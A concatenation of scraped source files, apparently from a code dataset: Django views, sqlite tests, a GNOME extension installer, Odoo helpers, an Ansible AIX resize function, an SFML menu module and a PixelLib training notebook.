'.join(warnings) or ''\r\n try:\r\n Clients.objects.bulk_create(to_create)\r\n except ValueError as e:\r\n message_error = e\r\n message_success = ''\r\n message_warning = ''\r\n context['message_success'] = message_success\r\n context['message_warning'] = message_warning\r\n context['message_error'] = message_error\r\n\r\n else:\r\n client_form = ClientForm(request.POST, user=user)\r\n if client_form.is_valid():\r\n user = user\r\n name = client_form.cleaned_data['name']\r\n phone = client_form.cleaned_data['phone']\r\n record = client_form.cleaned_data['record']\r\n client = Clients.objects.create(\r\n user=user, name=name, phone=phone, record=record)\r\n if client:\r\n context['message_success'] = u'Клиент добавлен в список обзвона'\r\n client_form = ClientForm()\r\n file_form = UploadFileForm()\r\n clients_all = Clients.objects.filter(user=user)\r\n clients_curr = Paginator(clients_all, 10)\r\n page_number = request.GET.get('pn') or 1\r\n context['user'] = user\r\n context['clients'] = clients_curr.page(page_number)\r\n context['client_form'] = client_form\r\n context['file_form'] = file_form\r\n return render_to_response('clients.html', context)\r\n\r\n\r\ndef records(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n context = {}\r\n context.update(csrf(request))\r\n if request.POST:\r\n record_form = RecordForm(request.POST, request.FILES)\r\n if record_form.is_valid():\r\n user = user\r\n title = record_form.cleaned_data['title']\r\n record = Records.objects.create(\r\n user=user, title=title, file=request.FILES['file'])\r\n if record:\r\n context['message_success'] = u'Сообщение добавлено'\r\n record_form = RecordForm()\r\n records = Records.objects.filter(user=user)\r\n context['record_form'] = record_form\r\n context['user'] = user\r\n context['records'] = records\r\n return render_to_response('records.html', context)\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef statistic(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n page_number = request.GET.get('pn') or 1\r\n context = {}\r\n context.update(csrf(request))\r\n statistic_form = StatisticSearch(request.POST or None)\r\n statistic_all = Statistics.objects.filter(user=user)\r\n statistic_curr = Paginator(statistic_all, 10)\r\n context['user'] = user\r\n context['statistics'] = statistic_curr.page(page_number)\r\n context['statistic_form'] = statistic_form\r\n return render_to_response('statistic.html', context)\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef export(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n myQuery = Q(user=user)\r\n statistic_filtered = Statistics.objects.filter(myQuery)\r\n response = HttpResponse(content_type='text/csv')\r\n writer = csv.writer(response, delimiter=';')\r\n writer.writerow([u'Имя клиента'.encode('cp1251'),\r\n u'Телефон'.encode('cp1251'),\r\n u'Сообщение'.encode('cp1251'),\r\n u'Дата звонка'.encode('cp1251'),\r\n u'Время звонка'.encode('cp1251'),\r\n u'Статус'.encode('cp1251')])\r\n for row in statistic_filtered:\r\n name = row.name.encode('cp1251')\r\n phone = row.phone\r\n record = row.record.encode('cp1251')\r\n date = row.date\r\n time = row.time\r\n status = row.status\r\n writer.writerow([name, phone, record, date, time, status])\r\n time_now = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M')\r\n response['Content-Disposition'] = 'attachment; filename=\"' + time_now + '.csv\"'\r\n return response\r\n else:\r\n return 
redirect(reverse('inform:index'))\r\n\r\n\r\ndef remove_client(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n to_delete = request.GET.get('rm')\r\n if to_delete == 'all':\r\n Clients.objects.filter(user=user).delete()\r\n else:\r\n try:\r\n Clients.objects.get(id=to_delete).delete()\r\n except ObjectDoesNotExist:\r\n print('no object %s' % to_delete)\r\n pass\r\n return redirect(reverse('inform:clients'))\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef remove_record(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n to_delete = request.GET.get('rm')\r\n if to_delete == 'all':\r\n Records.objects.filter(user=user).delete()\r\n else:\r\n try:\r\n Records.objects.get(id=to_delete).delete()\r\n except ObjectDoesNotExist:\r\n print('no object %s' % to_delete)\r\n pass\r\n return redirect(reverse('inform:records'))\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef start_inform(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n context = {}\r\n context.update(csrf(request))\r\n clients_all = Clients.objects.filter(user=user)\r\n context = {\r\n 'user': user,\r\n 'clients': clients_all,\r\n }\r\n return render_to_response('startinform.html', context)\r\n else:\r\n return redirect(reverse('inform:index'))\r\n","sub_path":"inform/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"98467668","text":"import os\nimport sqlite3\nimport unittest\n\nfrom mmvizutil.db.query import (\n Query,\n db_query_df,\n db_query_list,\n query_bar,\n query_scatter\n)\n\nfrom mmvizutil.db.sqlite import (\n query_box\n)\n\ndef db_sqlite_path(fname):\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(cur_dir, fname)\n\nDB_FILE_PATH = db_sqlite_path(\"data/customer.db\")\n\n\ndef db_query_customer():\n\n query = Query()\n query.value = \"select income num_1, travel_spending num_2, state cat_1 from customer\"\n\n return query\n\n\nclass TestSqliteQuery(unittest.TestCase):\n\n def test_query_list(self):\n\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_list(connection, db_query_customer())\n print(result)\n\n def test_query_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, db_query_customer())\n print(result)\n\n def test_query_box_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, query_box(db_query_customer()))\n print(result)\n\n def test_query_bar_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, query_bar(db_query_customer()))\n print(result)\n\n def test_query_scatter_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, query_scatter(db_query_customer(), \"max\", \"avg\"))\n print(result)\n\n# def main():\n# result = db_sqlite_query_df(db_query_customer_income())\n# print(result)\n#\n# if __name__ == \"__main__\": main()","sub_path":"test/sqlite/test_db_query.py","file_name":"test_db_query.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"164556785","text":"#!/usr/bin/python3\nimport os, requests, json, lxml.html, subprocess, zipfile, shutil, re\n\nclass ExtensionManager():\n\n def __init__(self):\n self.extensions_local_path = 
os.getenv(\"HOME\") + \"/.local/share/gnome-shell/extensions/\"\n self.extensions_sys_path = \"/usr/share/gnome-shell/extensions/\"\n self.results = []\n self.installed = self.list_all_extensions()\n self.version = self.run_command(\"gnome-shell --version\").split()[2]\n \n def run_command(self, command):\n return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE).stdout.read().decode() \n\n def list_all_extensions(self):\n installed_extensions = []\n uuids = self.list_user_extensions() + self.list_system_extensions()\n enabled_extensions = re.findall(r'\\'(.+?)\\'', self.run_command(\"gsettings get org.gnome.shell enabled-extensions\"))\n for uuid in uuids:\n extension_local_path = self.extensions_local_path + uuid\n extension_sys_path = self.extensions_sys_path + uuid\n\n extension_data = {\"uuid\": uuid, \"local\": self.extension_is_local(uuid)}\n if uuid in enabled_extensions:\n extension_data[\"enabled\"] = True\n else:\n extension_data[\"enabled\"] = False\n if extension_data[\"local\"] == True:\n metadata = open(extension_local_path + \"/metadata.json\", \"r\").read()\n else:\n metadata = open(extension_sys_path + \"/metadata.json\").read()\n metadata = json.loads(metadata)\n\n # Check for preferences\n if os.path.exists(extension_sys_path + \"/prefs.js\") or os.path.exists(extension_local_path + \"/prefs.js\"):\n extension_data[\"prefs\"] = True\n else:\n extension_data[\"prefs\"] = False\n\n extension_data[\"name\"] = metadata[\"name\"]\n installed_extensions.append(extension_data)\n return installed_extensions\n \n def extension_is_local(self, uuid):\n if uuid in self.list_user_extensions():\n return True\n else:\n return False\n\n def list_system_extensions(self):\n return os.listdir(self.extensions_sys_path)\n\n def list_user_extensions(self):\n try:\n return os.listdir(self.extensions_local_path)\n except FileNotFoundError:\n os.mkdir(self.extensions_local_path)\n return os.listdir(self.extensions_local_path)\n\n def search(self, query):\n try:\n response = self.get_request(\"https://extensions.gnome.org/extension-query/?page=1&search=\" + query)\n except:\n raise\n return \n self.results = json.loads(response.text)[\"extensions\"]\n\n def get_extensions(self, uuid):\n # Parse the extension webpage and get the json from the data-svm element\n url = \"https://extensions.gnome.org\" + self.results[self.get_index(uuid)][\"link\"]\n try:\n response = self.get_request(url)\n except:\n raise\n\n root = lxml.html.fromstring(response.text)\n content = root.xpath(\"/html/body/div[2]/div/div[2]/@data-svm\")[0]\n releases = json.loads(content)\n\n # Get matching version\n extension_id = \"\"\n\n # Iterate through the different releases and get the matching one for your gnome version and failsafe to the lastest release\n subversions = []\n for key, value in releases.items():\n subversions.append(float(key[2:]))\n\n if self.version.startswith(str(key)):\n extension_id = str(value[\"pk\"])\n \n # If the ID doesn't start with your current version, get the highest one\n if extension_id == \"\":\n\n # Use re to remove .0 from the float conversion above\n max_subversion = re.sub('\\.0$', '', str(max(subversions)))\n highest_version = \"3.\" + max_subversion\n extension_id = str(releases[highest_version][\"pk\"])\n\n # Download and install\n try:\n self.download(\"https://extensions.gnome.org/download-extension/\" + uuid + \".shell-extension.zip?version_tag=\" + extension_id, uuid)\n self.install(uuid)\n except:\n raise\n\n def get_index(self, uuid):\n for index, entry in 
enumerate(self.results):\n if entry[\"uuid\"] == uuid:\n return index\n \n def get_uuid(self, index):\n return self.results[index][\"uuid\"]\n\n def download(self, url, uuid):\n try:\n response = self.get_request(url)\n with open(self.get_zip_path(uuid), \"wb\") as file:\n file.write(response.content)\n print(\"Downloaded \" + uuid)\n except:\n raise\n\n def remove(self, uuid):\n install_path = self.extensions_local_path + uuid\n if os.path.isdir(install_path):\n print(\"Deleting \" + uuid)\n try:\n shutil.rmtree(install_path)\n except:\n raise\n self.installed = self.list_all_extensions()\n \n def get_image(self, uuid):\n url = \"https://extensions.gnome.org\" + self.results[self.get_index(uuid)][\"icon\"]\n if url == \"https://extensions.gnome.org/static/images/plugin.png\":\n return None\n try:\n response = self.get_request(url)\n return response.content\n except:\n raise\n \n def get_request(self, url):\n response = requests.get(url)\n if response == None:\n raise\n return\n return response\n \n def set_extension_status(self, uuid, status):\n self.run_command(\"gnome-extensions \" + status + \" \" + uuid)\n \n def get_zip_path(self, uuid):\n return \"/tmp/\" + uuid + \".zip\"\n\n def install(self, uuid):\n # Remove old extension \n self.remove(uuid)\n zip_path = self.get_zip_path(uuid)\n\n # Create new folder with matching uuid and extract to it\n install_path = self.extensions_local_path + uuid\n\n try:\n os.mkdir(install_path)\n with zipfile.ZipFile(zip_path,\"r\") as zip_ref:\n zip_ref.extractall(install_path)\n os.remove(zip_path)\n self.installed = self.list_all_extensions()\n print(\"Installed \" + uuid)\n \n except:\n raise\n\n\n\n","sub_path":"extensionmanager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"549300844","text":"# _*_ coding: utf-8 _*_\r\nfrom Tkinter import* \r\n\r\nmaster = Tk() # 创建根窗口\r\n\r\nlistbox = Listbox(master) # 引入Listbox组件,创建消息窗口\r\nlistbox.pack() # 组块\r\n\r\nlistbox.insert(END, \"a list entry\") # 输出某值\r\n\r\nfor item in range(0,30): # 输出列表元素,与本次任务吻合\r\n\tlistbox.insert(END, item)\r\n\r\nmainloop() # 进入消息循环,否则无法显示界面\r\n\r\n","sub_path":"_src/om2py2w/2wex0/tk_listbox.py","file_name":"tk_listbox.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"204730767","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _ \nimport logging\n_logger = logging.getLogger(__name__)\n\nclass AccountInvoice(models.Model):\n\t_inherit = 'account.invoice'\n\n\t@api.multi\n\tdef get_bom_details_summary(self):\n\t\tif self.invoice_line_ids: \n\t\t\tproduct_bom_list = {}\n\t\t\tfor invoice_id in self.invoice_line_ids:\n\t\t\t\tbom_obj = self.env['mrp.bom'].search([('product_tmpl_id','=', invoice_id.product_id.product_tmpl_id.id),\n\t\t\t\t\t\t\t\t\t\t\t\t\t ('company_id','=', self.company_id.id),\n\t\t\t\t\t\t\t\t\t\t\t\t\t ('type','=', 'phantom')], limit=1)\n\t\t\t\tif bom_obj:\n\t\t\t\t\tquantity_converted = invoice_id.quantity / bom_obj.product_qty\n\t\t\t\t\tbom_ctr = 1\n\n\t\t\t\t\tfor line_id in bom_obj.bom_line_ids:\n\t\t\t\t\t\tif line_id.id != bom_obj.bom_line_ids.ids[0]:\n\n\t\t\t\t\t\t\tnames = str(line_id.product_id.id) + 'UOM' + str(line_id.product_uom_id.id)\n\t\t\t\t\t\t\tproduct_name = line_id.product_id.name\n\n\t\t\t\t\t\t\tif line_id.product_id.description_sale:\n\t\t\t\t\t\t\t\tproduct_name = 
line_id.product_id.description_sale\n\n\t\t\t\t\t\t\tif names not in product_bom_list:\n\t\t\t\t\t\t\t\tproduct_bom_list[names] = [\n\t\t\t\t\t\t\t\t\tproduct_name,\n\t\t\t\t\t\t\t\t\tline_id.product_uom_id,\n\t\t\t\t\t\t\t\t\tquantity_converted * line_id.product_qty]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tproduct_bom_list[names][2] += (quantity_converted * line_id.product_qty)\n\t\t\t\t\t\t\tbom_ctr +=1\n\t\t\treturn product_bom_list\n\t\treturn False\n\n\n\nclass AccountInvoiceLine(models.Model):\n\t_inherit = 'account.invoice.line'\n\n\t@api.multi\n\tdef get_product_bom_details(self):\n\t\tself.ensure_one()\n\t\tbom_obj = self.env['mrp.bom'].search([('product_tmpl_id','=', self.product_id.product_tmpl_id.id),\n\t\t\t\t\t\t\t\t\t\t ('company_id','=', self.company_id.id),\n\t\t\t\t\t\t\t\t\t\t ('type','=', 'phantom')], limit=1)\n\t\tif bom_obj:\n\t\t\t#raise Warning(bom_obj.bom_line_ids[1:])\n\t\t\treturn bom_obj.bom_line_ids[0]\n\n\t\treturn False\n\n\n\n\n\n\n\n# class goodheart(models.Model):\n# _name = 'goodheart.goodheart'\n# name = fields.Char()\n# value = fields.Integer()\n# value2 = fields.Float(compute=\"_value_pc\", store=True)\n# description = fields.Text()\n#\n# @api.depends('value')\n# def _value_pc(self):\n# self.value2 = float(self.value) / 100\n","sub_path":"gh_shoot_so_coneland/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"88024018","text":"import re\n\n\ndef calculate():\n fo = open(\"data.txt\", \"r+\")\n lines = fo.readlines()\n total = 0\n grp = []\n for line in lines:\n line = line.strip()\n if line == \"\":\n total += group_sum(grp)\n grp = []\n else:\n grp.append(line)\n\n total += group_sum(grp)\n return total\n\ndef group_sum(lines):\n group_results = 0\n for line in lines:\n group_results |= person_binary(line)\n return sum(int(b) for b in \"{0:b}\".format(group_results))\n\ndef person_binary(answers):\n hash = 0\n for letter in answers:\n hash |= 2**order_number(letter)\n return hash\n\ndef order_number(letter):\n return ord(letter) - ord('a')\n","sub_path":"day06a/program_lib.py","file_name":"program_lib.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"516663146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom rest_framework import permissions\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom picpay.search import *\n\nfrom .secrets import *\n\n__author__ = 'Roberto Morati '\n__copyright__ = ' Copyright (c) 2017'\n__version__ = '0.0.1'\n\n\nclass InfoSearchViewSet(APIView):\n \"\"\"\n title: Basic Info to start the Search\n\n * description: Return the informations that are necessary to use the service api.v1.search\"\n\n * retrieve: token to start the search\n \"\"\"\n permission_classes = (permissions.AllowAny,)\n\n def get(self, request, *args, **kw):\n\n infs = {}\n if 'data_search' in kw:\n infs = info_search(kw['data_search'])\n else:\n infs = info_search()\n\n if 'success' in infs:\n for key in list(request.session.keys()):\n del request.session[key]\n request.session.modified = True\n\n token = token_hex(6)\n request.session[token] = infs\n\n response = {}\n response['pages'] = infs['pages']\n response['total'] = infs['total']\n response['success'] = infs['success']\n response['token'] = token\n print(\"token : \" + 
str(response['token']))\n else:\n response = {}\n response['error'] = infs['error']\n return Response(response, status=status.HTTP_200_OK)\n\n\nclass UserSearchViewSet(APIView):\n \"\"\"\n title: Search by users\n\n * description: Return the informations about users.\n\n * retrieve: users (id, username and fullname)\n \"\"\"\n\n permission_classes = (permissions.AllowAny,)\n\n def get(self, request, *args, **kw):\n response = {}\n if 'token' in kw:\n if kw['token'] in request.session:\n if 'data_search' in kw:\n if not (kw['data_search'] == request.session[kw['token']]['data_search']):\n response['error'] = 'data_search invalid'\n else:\n response = search(data_search=kw['data_search'], info_search=request.session[kw['token']], page=(int(kw['page']) - 1))\n else:\n if not ('data_search' in kw):\n if request.session[kw['token']]['data_search'] is not None:\n response['error'] = 'data_search invalid'\n else:\n response = search(info_search=request.session[kw['token']], page=(int(kw['page']) - 1))\n else:\n response['error'] = 'invalid token'\n return Response(response, status=status.HTTP_200_OK)\n","sub_path":"api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"275796404","text":"def resize_fs(module, filesystem, size):\n ' Resize LVM file system. '\n chfs_cmd = module.get_bin_path('chfs', True)\n if (not module.check_mode):\n (rc, chfs_out, err) = module.run_command(('%s -a size=\"%s\" %s' % (chfs_cmd, size, filesystem)))\n if (rc == 28):\n changed = False\n return (changed, chfs_out)\n elif (rc != 0):\n if re.findall('Maximum allocation for logical', err):\n changed = False\n return (changed, err)\n else:\n module.fail_json('Failed to run chfs.', rc=rc, err=err)\n else:\n if re.findall('The filesystem size is already', chfs_out):\n changed = False\n else:\n changed = True\n return (changed, chfs_out)\n else:\n changed = True\n msg = ''\n return (changed, msg)","sub_path":"Data Set/bug-fixing-3/75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_name":"75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"537033116","text":"#encoding=utf-8\nfrom django.shortcuts import render, render_to_response\n\n# Create your views here.\nfrom blogs.models import passage\n\n\ndef home(req):\n posts = []\n\n return render_to_response(\"pages/home.html\", {\"posts\":posts})\n\ndef example_home(req):\n posts = []\n\n raws = passage.objects.filter()[:10]\n for blograw in raws:\n if blograw.type == 1:\n standard_post = {}\n standard_post[\"id\"] = blograw.id\n standard_post[\"type\"] = blograw.type\n standard_post[\"title\"] = blograw.title\n standard_post[\"text\"] = blograw.text\n standard_post[\"time\"] = blograw.time\n standard_post[\"author\"] = blograw.author\n standard_post[\"href\"] = blograw.href\n standard_post[\"tags\"] = blograw.tags.split(\"|\")\n posts.append(standard_post)\n elif blograw.type == 2:\n gallary_post = {}\n gallary_post[\"id\"] = blograw.id\n gallary_post[\"imgs\"] = blograw.quote.split(\"|\")\n gallary_post[\"type\"] = 2\n gallary_post[\"title\"] = \"测试文章\"\n gallary_post[\"text\"] = blograw.text\n gallary_post[\"time\"] = blograw.time\n gallary_post[\"author\"] = blograw.author\n gallary_post[\"href\"] = blograw.href\n gallary_post[\"tags\"] = blograw.tags.split(\"|\")\n\n posts.append(gallary_post)\n elif 
blograw.type == 3:\n youtube_post = {}\n youtube_post[\"id\"] = blograw.id\n youtube_post[\"ylink\"] = blograw.link\n youtube_post[\"type\"] = 3\n youtube_post[\"title\"] = \"测试文章\"\n youtube_post[\"text\"] = blograw.text\n youtube_post[\"time\"] = blograw.time\n youtube_post[\"author\"] = blograw.author\n youtube_post[\"href\"] = blograw.href\n youtube_post[\"tags\"] = blograw.tags.split(\"|\")\n posts.append(youtube_post)\n elif blograw.type == 4:\n link_post = {}\n link_post[\"id\"] = blograw.id\n link_post[\"link\"] = \"http://www.wrapbootstrap.com/\"\n link_post[\"type\"] = 4\n link_post[\"title\"] = \"测试文章\"\n link_post[\"text\"] = blograw.text\n link_post[\"time\"] = blograw.time\n link_post[\"author\"] = blograw.author\n link_post[\"href\"] = blograw.href\n link_post[\"tags\"] = blograw.tags.split(\"|\")\n posts.append(link_post)\n elif blograw.type == 5:\n quote_post = {}\n quote_post[\"id\"] = blograw.id\n quote_post[\"quote\"] = blograw.quote\n quote_post[\"type\"] = 5\n quote_post[\"author\"] = blograw.author\n posts.append(quote_post)\n\n\n\n pages = [[1, \"\"], [2, \"\"], [3, \"\"]]\n current_page = 2\n tags = [[\"Java\", \"/tag/java\"], [\"Python\", \"/tag/python\"], [\"NLP\", \"/tag/nlp\"], [\"Machine Learning\", \"/tag/ml\"]]\n\n return render_to_response(\"pages/home.html\", {\"posts\":posts, \"pages\":pages, \"current_page\":current_page, \"tags\":tags})\n\n\ndef blog(req, bid=0):\n blograw = passage.objects.get(id=bid)\n post = {}\n if blograw.type == 1:\n post[\"id\"] = blograw.id\n post[\"type\"] = blograw.type\n post[\"title\"] = blograw.title\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 2:\n post[\"id\"] = blograw.id\n post[\"imgs\"] = blograw.quote.split(\"|\")\n post[\"type\"] = 2\n post[\"title\"] = \"测试文章\"\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 3:\n post[\"id\"] = blograw.id\n post[\"ylink\"] = blograw.link\n post[\"type\"] = 3\n post[\"title\"] = \"测试文章\"\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 4:\n post[\"id\"] = blograw.id\n post[\"link\"] = \"http://www.wrapbootstrap.com/\"\n post[\"type\"] = 4\n post[\"title\"] = \"测试文章\"\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 5:\n post[\"id\"] = blograw.id\n post[\"quote\"] = blograw.quote\n post[\"type\"] = 5\n post[\"author\"] = blograw.author\n\n return render_to_response(\"pages/blog.html\", {\"bid\":bid, \"post\":post})\n\ndef publish(req):\n return render_to_response(\"pages/publish.html\")\n\n# Create your views here.\ndef about(req):\n return render_to_response(\"pages/about.html\", {})\n\n# Create your views here.\ndef contact(req):\n return render_to_response(\"pages/about.html\", {})\n\n# Create your views here.\ndef works(req):\n return render_to_response(\"pages/about.html\", {})\n","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} 
+{"seq_id":"168269219","text":"import sf\nimport resourcemanager\n\nclass Menu (object):\n def __init__ (self, game, width = 50):\n self.game = game\n\n self.x = 0\n self.y = 0\n self.width = width\n \n self.font = resourcemanager.get('font.menu')\n \n self.entries = []\n self.selected_index = 0\n\n self.input = []\n \n def add_title (self, label, label_size=24):\n self.add_entry(None, label, label_size)\n\n def add_entry (self, widget, label=None, label_size=24):\n ''' append an entry to the menu\n None widgets will be treated as separators/titles '''\n \n if widget: widget.menu = self\n \n entry = {\n 'label': sf.Text(label, self.font, label_size) if label else None,\n 'widget': widget\n }\n \n self.entries.append(entry)\n \n this_index = self.entries.index(entry)\n \n if this_index > 0:\n # if previous entry is unselectable, make this one the selected one\n if self.entries[this_index-1]['widget'] == None:\n self.selected_index = this_index\n\n def change_selected(self, index):\n if not index == self.selected_index:\n self.selected_index = index\n resourcemanager.get(\"sound.menu_change\").play()\n \n def execute_action(self):\n \n resourcemanager.get(\"sound.menu_select\").play()\n \n entry = self.entries[self.selected_index]\n entry['callback'](entry['data']) if entry['data'] else entry['callback']()\n\n def update (self, input):\n mx, my = sf.Mouse.get_position(self.game.window)\n\n index_changed = False\n execute_action = False\n index = self.selected_index\n \n if input['up']:\n\n if index == 0:\n index = len(self.entries)-1\n else:\n index -= 1\n \n index_changed = True\n \n elif input['down']:\n \n if index == len(self.entries)-1:\n index = 0\n else:\n index += 1\n \n index_changed = True\n \n for i, entry in enumerate(self.entries):\n if entry['widget']:\n entry['widget'].dehilight()\n\n local_bounds = sf.FloatRect()\n \n if entry['widget']:\n local_bounds.left = entry['widget'].x\n local_bounds.top = entry['widget'].y\n local_bounds.height = entry['widget'].height\n\n if entry['label']:\n local_bounds.left = entry['label'].x\n local_bounds.top = entry['label'].y\n local_bounds.height = entry['label'].local_bounds.height\n \n local_bounds.width = self.width\n \n if local_bounds.contains(mx, my) and entry['widget']:\n index = i\n index_changed = True\n \n if sf.Mouse.is_button_pressed(sf.Mouse.LEFT):\n input['confirm'] = True\n\n if index_changed:\n if self.entries[index]['widget'] == None:\n self.selected_index = index\n self.update(input)\n return # avoid using invalid index because recursion\n\n self.change_selected(index)\n \n self.entries[self.selected_index]['widget'].hilight()\n self.entries[self.selected_index]['widget'].update(input)\n\n def render (self, target):\n offset = 0\n i = 0\n for i, entry in enumerate(self.entries):\n lh = 0\n if entry['label']:\n entry['label'].x = self.x\n entry['label'].y = self.y + offset\n \n if self.selected_index == i:\n entry['label'].color = sf.Color.CYAN\n else:\n entry['label'].color = sf.Color.WHITE\n \n target.draw(entry['label'])\n lh = entry['label'].local_bounds.height\n\n wh = 0\n if entry['widget']:\n entry['widget'].x = self.x\n if entry['label']: entry['widget'].x += entry['label'].local_bounds.width + 10\n\n entry['widget'].y = self.y + offset\n entry['widget'].render(target)\n \n wh = entry['widget'].height\n\n offset += max(lh, wh) + 2\n\nclass Widget (object):\n def __init__ (self):\n self.x = 0\n self.y = 0\n\n self.menu = None\n self.color = sf.Color.WHITE\n \n def dehilight (self):\n self.color = sf.Color.WHITE\n\n 
def hilight (self):\n self.color = sf.Color.CYAN\n\n def update (self, input):\n pass\n\n def render(self, target):\n pass\n\nclass Button (Widget):\n def __init__ (self, label_text, width=100, height=25, callback=None, data=None, text_size=24):\n super(Button, self).__init__()\n self.width = width\n self.height = height\n\n self.label_text = label_text\n self.label_text_size = text_size\n self.label = None\n \n self.connect(callback, data)\n\n def connect (self, callback, data=None):\n self.callback = callback\n self.data = data\n\n def activate (self):\n resourcemanager.get(\"sound.menu_select\").play()\n\n if self.callback:\n if self.data:\n self.callback(self.data)\n else:\n self.callback()\n\n def update (self, input):\n if input['confirm']:\n self.activate()\n\n def render (self, target):\n if self.label == None:\n self.label = sf.Text(self.label_text, self.menu.font, self.label_text_size)\n\n self.label.x = self.x\n self.label.y = self.y\n self.label.color = self.color\n\n target.draw(self.label)\n\nclass Slider (Widget):\n def __init__ (self, width=200):\n super(Slider, self).__init__()\n\n self.height = 25\n self.width = width\n\n self.x = 0\n self.y = 0\n\n self.slide = sf.RectangleShape((10, 10))\n self.slide.origin = (5, 5)\n\n self.value = 0\n self.grabbed = False\n \n def update (self, input):\n mx, my = sf.Mouse.get_position(self.menu.game.window)\n\n local_bounds = sf.FloatRect(\n self.x, self.y,\n self.width, self.height\n )\n\n if local_bounds.contains(mx ,my):\n if sf.Mouse.is_button_pressed(sf.Mouse.LEFT):\n self.grabbed = True\n\n if self.grabbed:\n if sf.Mouse.is_button_pressed(sf.Mouse.LEFT):\n self.value = ((mx - self.x) / float(self.width)) * 100\n else:\n self.grabbed = False\n\n if input['left']:\n self.value -= 1\n elif input['right']:\n self.value += 1\n\n # clamp within [0, 100]\n self.value = max(0, min(self.value, 100))\n\n def render (self, target):\n line = sf.RectangleShape((self.width,1))\n line.x = self.x\n line.y = self.y + self.height/1.5\n line.fill_color = self.color\n\n self.slide.x = self.x + self.width * (self.value/100.0)\n self.slide.y = line.y\n self.slide.fill_color = self.color\n\n target.draw(line)\n target.draw(self.slide) \n","sub_path":"lapsus/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"598142320","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Image Segmentation Using Python's PixelLib Package: \n# Last modified: July 13, 2021\n\n# ## Useful links / Citations:\n# https://towardsdatascience.com/custom-instance-segmentation-training-with-7-lines-of-code-ff340851e99b\n# https://pixellib.readthedocs.io/en/latest/custom_inference.html\n\n# ## Import PixelLib and load random training photo:\n# Shows a random training photo with handpicked mask polygon from LabelMe annotation.\n# Run cell multiple times to make sure your image annotations are showing up as expected.\n\n# In[1]:\n\n\nimport pixellib\nfrom pixellib.custom_train import instance_custom_training\n\nvis_img = instance_custom_training()\nvis_img.load_dataset(\"/Users/sebastianperezlopez/Desktop/PixelLabTesting/SeepageDatasetNEW.nosync\")\nvis_img.visualize_sample()\n\n\n# ## Train model\n# Load MaskRCNN model, load pre-trained coco weights, set batch size / epochs / data augmentation\n\n# In[3]:\n\n\nimport pixellib\nfrom pixellib.custom_train import instance_custom_training\n\ntrain_maskrcnn = 
